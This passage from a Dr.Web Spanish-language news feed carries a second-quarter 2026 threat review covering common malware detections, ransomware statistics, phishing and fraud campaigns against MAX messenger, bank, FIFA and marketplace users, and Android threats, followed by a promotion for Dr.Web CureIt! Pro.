&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/01_stat_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Las amenazas más populares del II trimestre del año 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;Adware.Downware.20091&lt;/dt&gt;
    &lt;dt&gt;Adware.Downware.20766&lt;/dt&gt;
    &lt;dd&gt;Adware que sirve de instalador intermediario de software pirata.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Siggen31.34463&lt;/dt&gt;
    &lt;dd&gt;Un troyano creado en lenguaje de programación Go que sirve para descargar varios miners y adware en el sistema objetivo. El malware es un archivo DLL y está en &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Para su inicio, usa la vulnerabilidad de la clase DLL Search Order Hijacking en el cliente torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;Trojan.BPlug.4268&lt;/dt&gt;
    &lt;dd&gt;Detección del componente malicioso de la extensión para navegador WinSafe. Este componente es un script de JavaScript que visualiza publicidad importuna en navegadores.&lt;/dd&gt;
    &lt;dt&gt;Trojan.Starter.8319&lt;/dt&gt;
    &lt;dd&gt;Detección de scripts XML maliciosos que inician el troyano &lt;a href="https://vms.dr-web.es/search/?q=Trojan.AutoIt.289&amp;lng=es"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt;  sus componentes.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Estadísticas de malware en el tráfico de correo&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/02_mail_traffic_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Las amenazas más populares del II trimestre del año 2026 en el tráfico de correo&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;X97M.DownLoader.2343&lt;/dt&gt;
    &lt;dd&gt;Un archivo XLSX (formato de tablas electrónicas Microsoft Excel) con un objeto OLE que descarga un archivo malicioso en el equipo atacado.&lt;/dd&gt;
    &lt;dt&gt;W97M.DownLoader.2938&lt;/dt&gt;
    &lt;dd&gt;Una familia de troyanos descargadores que usan las vulnerabilidades de documentos Microsoft Office. Sirven para descargar otro malware en el equipo atacado.&lt;/dd&gt;
    &lt;dt&gt;Exploit.CVE-2017-11882.123&lt;/dt&gt;
    &lt;dt&gt;Exploit.CVE-2018-0798.4&lt;/dt&gt;
    &lt;dd&gt;Una familia de troyanos descargadores que usan las vulnerabilidades de documentos Microsoft Office. Sirven para descargar otro malware en el equipo atacado.&lt;/dd&gt;
    &lt;dt&gt;JS.Muldrop.1171&lt;/dt&gt;
    &lt;dd&gt;Un script malicioso en formato JavaScript que ejecuta en el sistema objetivo el malware que lleva oculto.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Cifradores&lt;/h3&gt;

&lt;p&gt;Comparado con el I trimestre del año 2026, en el II trimestre el número de solicitudes para descifrar los archivos afectados por los programas troyanos cifradores bajó un poco, un 2,67%.&lt;/p&gt;

&lt;p&gt;
Dinámica de recepción de solicitudes para descifrar al servicio de soporte técnico de Doctor Web:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/03_encoder_requests_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Los encodres más populares del II trimestre del año 2026&lt;/p&gt;

&lt;ul class="list"&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 14,47% de solicitudes de usuarios&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 5,26% de solicitudes de usuarios&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.37400&lt;/b&gt; — 3,95% de solicitudes de usuarios&lt;/li&gt;
   &lt;li&gt;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.Encoder.35209&amp;lng=es"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3,29% de solicitudes de usuarios&lt;/li&gt;
   &lt;li&gt;&lt;b&gt;Trojan.Encoder.44197&lt;/b&gt; — 2,63% de solicitudes de usuarios&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Fraudulencias en la red&lt;/h3&gt;

&lt;p&gt;Una de las tendencias observadas por los analistas de Internet de Doctor Web durante el segundo trimestre de 2026 fue que, a medida que aumentaba la audiencia del messenger ruso MAX, los ciberdelincuentes comenzaron a intensificar sus ataques contra los usuarios de esta plataforma. Para ello, recurrieron a esquemas ya conocidos que anteriormente estaban dirigidos a usuarios de otros servicios de mensajería, como Telegram y WhatsApp.&lt;/p&gt;

&lt;p&gt;Por ejemplo, nuestros expertos detectaron numerosos sitios fraudulentos creados para robar cuentas de MAX bajo la apariencia de distintas votaciones. A las posibles víctimas se les invita a participar en un concurso o votación, pero para ello deben iniciar sesión en su cuenta introduciendo su número de teléfono móvil y el código de verificación recibido posteriormente. Cuando el usuario facilita estos datos, los atacantes obtienen acceso a su cuenta.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/04_fake_max_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de un sitio web phishing con el cual los estafadores acceden a la cuenta del Messenger MAX de la víctima&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante el segundo trimestre, los analistas de Internet de Doctor Web detectaron la aparición de nuevos sitios web fraudulentos relacionados con inversiones. Además, los ciberdelincuentes siguieron las tendencias actuales y continuaron explotando activamente la temática de la inteligencia artificial.&lt;/p&gt;

&lt;p&gt;Por ejemplo, en algunos de estos sitios ofrecían a las posibles víctimas la posibilidad de sumarse a un nuevo proyecto de inversión supuestamente vinculado a importantes entidades financieras rusas. Los estafadores prometían acceso a un chatbot especializado basado en la red neuronal ChatGPT, diseñado para ayudar en las inversiones. Para convertirse en participantes de este supuesto «proyecto», los visitantes debían registrarse facilitando información personal. &lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/05_fake_invest_gptbot_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web fraudulento ofrece registrarse en un supuesto proyecto de inversión vinculado a uno de los bancos rusos y obtener acceso a un chatbot financiero especializado basado en la red neuronal ChatGPT&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Al mismo tiempo, los estafadores intentaban atraer a los usuarios de habla rusa utilizando no solo los nombres de bancos rusos, sino también los de entidades financieras extranjeras. Por ejemplo, los ciberdelincuentes presentaban varios sitios web de supuestos servicios de inversión como si estuvieran vinculados a bancos surcoreanos. &lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno de los sitios fraudulentos que ofrecía a los usuarios rusohablantes participar en un supuesto proyecto de inversión de un banco surcoreano y prometía ingresos de hasta 2.000.000 de wones surcoreanos&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Durante el segundo trimestre continuó la actividad de los estafadores que intentaban robar credenciales de acceso a distintos servicios. Entre los numerosos sitios de phishing detectados figuraban páginas falsas que se hacían pasar por empresas de transporte. Uno de estos sitios estaba dirigido a los clientes de un servicio ruso de mensajería urgente.&lt;/p&gt;

&lt;p&gt;A las posibles víctimas se les ofrecía iniciar sesión en su cuenta utilizando el número de teléfono móvil asociado a la misma o autenticarse a través del portal ruso de servicios públicos electrónicos Gosuslugi. Sin embargo, incluso después de «acceder» a la cuenta mediante la primera opción, el sitio seguía mostrando una segunda página de phishing, presentada como un formulario de autenticación a través de Gosuslugi.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Mediante este sitio fraudulento, los ciberdelincuentes podían robar las credenciales de varias cuentas a la vez: tanto las del área personal de la empresa de transporte como las del portal ruso de servicios públicos Gosuslugi&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nuestros expertos también detectaron nuevos sitios web de phishing que suplantaban a entidades financieras de distintos países. Así, a los clientes de uno de los bancos estadounidenses se les invitaba a iniciar sesión en su cuenta para comprobar si podían acceder a un tipo de interés más elevado reservado para «clientes fieles».&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;En otro caso, un sitio de phishing imitaba el diseño de uno de los bancos ecuatorianos y solicitaba a los usuarios su nombre de usuario y contraseña de acceso a la banca en línea:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Otra campaña de phishing estaba orientada a usuarios del Reino Unido. Los ciberdelincuentes creaban sitios web falsos de servicios públicos en los que proponían abonar una multa por aparcamiento indebido.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;A las posibles víctimas se les pedía información personal detallada con el pretexto de verificar su identidad y, a continuación, se las redirigía a una página para abonar la supuesta multa.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Una de las estafas más populares sigue siendo la promesa de recibir varios tipos de ayudas o pagos gratuitos. Sin embargo, los ciberdelincuentes adaptan constantemente este tipo de fraude a la actualidad. Así, con motivo de la celebración del Día de Rusia, comenzaron a aparecer sitios web falsos que imitaban a entidades financieras rusas y en los que los estafadores prometían pagos especiales con motivo de la festividad. En uno de ellos, se aseguraba a los usuarios que podían recibir entre 5.000 y 300.000 rublos por participar en una encuesta:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;En otra opción de este fraude, se prometía a los usuarios una supuesta «ayuda» de 5.000 rublos a cambio de completar una encuesta:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;En un contexto marcado por informaciones especulativas sobre una posible escasez de combustible en algunas regiones de Rusia, algunos de estos sitios ofrecían vales para recibir gratuitamente entre 20 y 100 litros de carburante:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Después de responder a algunas preguntas sencillas, a los visitantes de estos sitios se les ofrecía completar una supuesta «verificación de identidad» para poder recibir la recompensa prometida. Para ello, debían proporcionar su nombre y apellidos, número de teléfono móvil y número de tarjeta bancaria. Posteriormente, los estafadores podían utilizar esta información para robar dinero a las víctimas.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Entre los sitios web maliciosos detectados durante el segundo trimestre también hubo portales falsos de la Federación Internacional de Fútbol Asociación (FIFA). En ellos, los usuarios supuestamente podían adquirir, de forma oficial, entradas para los partidos de la Copa Mundial de la FIFA 2026, productos de merchandising y diversos servicios prémium.&lt;/p&gt;

&lt;p&gt;Al igual que en el sitio legítimo, a los visitantes de estas páginas fraudulentas se les ofrecía iniciar sesión con su cuenta FIFA ID. Sin embargo, el formulario de acceso aceptaba cualquier combinación de nombre de usuario y contraseña introducida por el usuario.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Formulario falso de inicio de sesión de FIFA ID&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Una vez seleccionado el producto deseado, los aficionados al fútbol podían tramitar la compra y realizar el pago. No obstante, durante este proceso eran redirigidos al sitio web de uno de los servicios que figura en la base de recursos de Internet no recomendados por el antivirus Dr.Web.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;El sitio web falso de la FIFA supuestamente permitía adquirir de forma oficial productos y servicios con licencia&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nuestros expertos también detectaron varias campañas de spam destinadas a difundir enlaces a sitios web falsos que se hacían pasar por conocidos marketplaces rusos. En ellos, los ciberdelincuentes invitaban a las posibles víctimas a participar en un supuesto «sorteo conmemorativo de aniversario». Los estafadores prometían premios tanto en metálico — de hasta 1.000.000 de rublos — como equipos informáticos y dispositivos móviles:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Para participar en la supuesta «promoción», los usuarios debían pulsar el botón correspondiente en estos sitios web. A continuación, se simulaba un proceso de sorteo de premios. Tras varios intentos, se informaba a la posible víctima de que había ganado varios regalos y de que supuestamente podía elegir entre recoger los premios en un punto de entrega del marketplace o recibir su equivalente en dinero mediante una transferencia bancaria.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Al elegir la opción de recibir los premios en un punto de recogida, los sitios web informaban de que los productos correspondientes se habían agotado. No obstante, aseguraban al usuario que todavía podía canjearlos por dinero. A continuación, la página simulaba una conversación con un operador para «confirmar» la intención de convertir los premios en efectivo. Para ello, la posible víctima debía facilitar el número de su tarjeta bancaria:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Tras introducirlo, los sitios web solicitaban el pago de una tasa administrativa para el supuesto «trámite oficial» del premio:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;En realidad, las víctimas de estafadores no recibían ningún premio. Además de facilitar los datos de sus tarjetas bancarias a los estafadores, también les entregaban su propio dinero.&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.dr-web.es/dangerous_urls/"&gt;Conozca más sobre los sitios web no recomendados por el antivirus Dr.Web&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Malware y software no deseado para dispositivos móviles&lt;/h3&gt;

&lt;p&gt;Según los datos estadísticos de detecciones de Dr.Web Security Space para dispositivos móviles, en el II trimestre del año 2026 los usuarios afrontaron los troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;, con menor frecuencia, pero estas aplicaciones troyanas siguieron siendo el malware más popular. Además, otra vez se observó una reducción de la actividad de los troyanos de publicidad &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Los programas potencialmente peligrosos detectados con mayor frecuencia en el II trimestre fueron las aplicaciones &lt;a href="https://vms.dr-web.es/search/?q=Tool.Obfuscator.TrashCode&amp;lng=es"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Tool.NPMod&amp;lng=es"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;, modificadas con la utilidad de modding NP Manager. Los creadores de virus usan esta herramienta para proteger malware contra la detección por antivirus. Los programas no deseados más populares fueron los antivirus falsos &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;. Para «desinfectar» las amenazas supuestamente encontradas, requieren adquirir una versión completa.&lt;/p&gt;

&lt;p&gt;El adware más activo fueron los módulos &lt;a href="https://vms.dr-web.es/search/?q=Adware.AdPush&amp;lng=es"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt; que visualizan notificaciones falsas y recaban la información privada. Otra vez se difundieron las aplicaciones de optimización del SO Android &lt;a href="https://vms.dr-web.es/search/?q=Adware.Bastion&amp;lng=es"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Generan notificaciones con supuestos mensajes sobre falta de memoria RAM y errores del sistema para mostrar publicidad durante el proceso de «optimización».&lt;/p&gt; 

&lt;p&gt;El adware &lt;b&gt;Adware.Opensite.15&lt;/b&gt; también mantuvo una elevada actividad. Los ciberdelincuentes lo distribuyen haciéndolo pasar por programas de trucos para videojuegos que supuestamente permiten obtener varios recursos dentro de los juegos. En realidad, estas aplicaciones únicamente abren sitios web con publicidad.&lt;/p&gt;

&lt;p&gt;En junio los expertos de la empresa Doctor Web &lt;a href="https://news.dr-web.es/show/?i=15262" target="_blank"&gt;advirtieron&lt;/a&gt; sobre el troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; que pudo esquivar las restricciones del SO Android y visualizar publicidad en modo de segundo plano. &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; usa algunas aplicaciones terceras para eso, así como algunas metodologías que selecciona en función del productor del dispositivo objetivo.&lt;/p&gt;

&lt;p&gt;Durante el II trimestre, nuestros analistas de virus detectaron en el catálogo Google Play más programas troyanos de las familias &lt;a href="https://vms.dr-web.es/search/?q=Android.Joker&amp;lng=es"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.Subscription&amp;lng=es"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;, que suscribían a usuarios a servicios de pago. En total, los mismos fueron descargados al menos 2 600 000 veces.&lt;/p&gt;

&lt;p&gt;Los eventos más destacados vinculados a la seguridad «móvil» en el II trimestre&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Los troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; siguieron siendo líderes en cuanto al número de detecciones de malware en los dispositivos protegidos por Dr.Web.&lt;/li&gt;
    &lt;li&gt;Los malintencionados siguieron aplicar activamente las herramientas especializadas para el modding de aplicaciones Android para proteger los troyanos bancarios contra la detección por los antivirus.&lt;/li&gt;
    &lt;li&gt;La actividad de los troyanos de publicidad &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; bajó otra vez.&lt;/li&gt;
    &lt;li&gt;Los analistas de virus de Doctor Web detectaron al troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.MagicAd.1&amp;lng=es"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, que usa los programas terceros para esquivar las restricciones del SO Android y visualizar publicidad en modo de segundo plano.&lt;/li&gt;
    &lt;li&gt;En el catálogo Google Play fueron detectadas nuevas aplicaciones troyanas que suscriben a los usuarios a servicios de pago.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Para más información sobre los eventos de virus en el II trimestre del año 2026, consulte nuestro &lt;a href="https://news.dr-web.es/show/review/?lng=es&amp;i=15274" target="_blank"&gt;informe&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15266&amp;lng=es</guid><title>¡La espera ha terminado! Dr.Web CureIt! Pro ya está disponible gratis para todos los usuarios</title><link>https://news.dr-web.es/show/?i=15266&amp;lng=es&amp;c=5</link><pubDate>Tue, 23 Jun 2026 11:55:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Le presentamos Dr.Web CureIt! Pro, la versión avanzada de la famosa utilidad de desinfección. Ya está disponible y puede obtener acceso promocional gratuito desde este mismo momento.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Cómo obtener Dr.Web CureIt! Pro gratis&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Para nuevos usuarios. &lt;/strong&gt;Acceda al sitio web &lt;a href="https://free.dr-web.es/download+cureit+free/?lng=es"&gt;free.dr-web.es&lt;/a&gt;. Complete el formulario habitual para obtener la versión estándar de Dr.Web CureIt! y recibirá un enlace para descargar Dr.Web CureIt! Pro con una licencia de 1 día. Sin pagos ocultos: simplemente rellene el formulario y desinfecte su ordenador utilizando las funciones de configuración avanzadas.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Para los usuarios actuales de la versión de pago de Dr.Web CureIt!. &lt;/strong&gt;Acceda a su Área personal, donde podrá descargar el instalador de Dr.Web CureIt! Pro. Descárguelo y utilícelo sin restricciones durante todo el período de validez de su licencia.&lt;/p&gt;&lt;p&gt;Le recordamos que la versión Pro le ofrece opciones flexibles de escaneo, administración de excepciones, asignación manual de acciones para las amenazas detectadas y estadísticas ampliadas.&lt;/p&gt;&lt;p&gt;¡Atención! El acceso promocional gratuito de 1 día a través del sitio web &lt;a href="https://free.dr-web.es/download+cureit+free/?lng=es"&gt;free.dr-web.es/&lt;/a&gt; es una oferta especial que le permite descubrir todas las ventajas de la versión Pro sin coste alguno. La oferta es válida hasta el 30 de junio de 2026, inclusive.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;A partir del 1 de julio de 2026 estarán disponibles:&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;La versión clásica gratuita de Dr.Web CureIt! para su descarga y desinfección de emergencia;&lt;/li&gt;&lt;li&gt;La versión avanzada de la utilidad Dr.Web CureIt! Pro.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;¿Tiene alguna pregunta o ha detectado un comportamiento inusual del programa? Su opinión es muy importante para nosotros. Envíenos sus comentarios y sugerencias a través del &lt;a href="https://forum.drweb.com/index.php?showforum=92"&gt;tema fijado especialmente &lt;/a&gt;para ello en nuestro foro oficial.&lt;br&gt;&lt;strong&gt;¡Descargue Dr.Web CureIt! Pro hoy mismo y controle por completo el proceso de desinfección gracias a sus funciones de configuración avanzadas!&lt;/strong&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15268&amp;lng=es</guid><title>Dr.Web CureIt! será aún más cómodo. Anuncio de la versión Pro 